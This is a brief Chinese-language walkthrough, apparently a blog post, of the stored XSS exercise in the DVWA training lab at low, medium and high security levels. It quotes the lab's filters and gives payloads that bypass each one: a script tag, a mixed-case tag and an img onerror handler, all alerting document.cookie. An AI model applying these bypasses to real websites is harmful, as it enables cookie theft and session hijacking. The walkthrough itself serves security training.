DVWA - XSS (Stored) (low, medium, high)

low

无验证,Massage直接注入

<script>alert(document.cookie)</script>

medium

查看源码发现Name只过滤了<scrpit>标签

$name = str_replace( '<script>', '', $name );  

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入script大写

<input name="txtName" type="text" size="30" maxlength="100">
<Script>alert(document.cookie)</script>

high

查看源码,可发现Name只用正则过滤了

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入换一种标签,这里用img

<img src=1 onerror=alert(document.cookie)>
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章